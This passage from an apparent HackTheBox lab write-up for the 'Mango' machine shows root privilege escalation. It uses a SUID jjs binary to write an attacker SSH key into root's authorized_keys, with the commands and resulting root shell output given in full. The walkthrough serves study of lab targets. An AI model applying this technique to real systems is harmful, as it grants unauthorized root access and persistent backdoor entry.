jjs
Following up with the enumeration, I will attempt to exploit the SUID binary
I initially was able to exploit the SUID binary and opened a shell session as the root user
However, the shell session doesn’t appear to be responsive.
SSH Key Write
I can opt out to the privileged file write operation to write my own SSH key into the authorized_keys file of the root user
This is done with an assumption that the root user frequently authenticate to the SSH server as enumerated with PEAS
$ /usr/lib/jvm/java-11-openjdk-amd64/bin/jjs
Warning: The jjs tool is planned to be removed from a future JDK release
jjs> var FileWriter = Java.type("java.io.FileWriter");
jjs> var fw=new FileWriter("/root/.ssh/authorized_keys");
jjs> fw.write("ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGoUoI9LYwEoMSDFaLZNQ51dLFNZf27nQjV7fooImm5g kali@kali");
jjs> fw.close();
jjs> exit()Done
┌──(kali㉿kali)-[~/archive/htb/labs/mango]
└─$ ssh root@$IP -i ~/.ssh/id_ed25519
Enter passphrase for key '/home/kali/.ssh/id_ed25519':
Welcome to Ubuntu 18.04.2 LTS (GNU/Linux 4.15.0-64-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Thu Sep 28 23:51:36 UTC 2023
System load: 0.14 Processes: 112
Usage of /: 37.1% of 19.56GB Users logged in: 1
Memory usage: 34% IP address for ens33: 10.10.10.162
Swap usage: 0%
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
122 packages can be updated.
18 updates are security updates.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Thu Oct 10 08:33:27 2019
root@mango:~# whoami
root
root@mango:~# hostname
mango
root@mango:~# ifconfig
ens33: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.10.10.162 netmask 255.255.255.0 broadcast 10.10.10.255
inet6 fe80::250:56ff:feb9:ab29 prefixlen 64 scopeid 0x20<link>
inet6 dead:beef::250:56ff:feb9:ab29 prefixlen 64 scopeid 0x0<global>
ether 00:50:56:b9:ab:29 txqueuelen 1000 (Ethernet)
RX packets 19796171 bytes 3144002463 (3.1 GB)
RX errors 0 dropped 89 overruns 0 frame 0
TX packets 18691414 bytes 9751148436 (9.7 GB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 154733 bytes 12783433 (12.7 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 154733 bytes 12783433 (12.7 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0System Level Compromise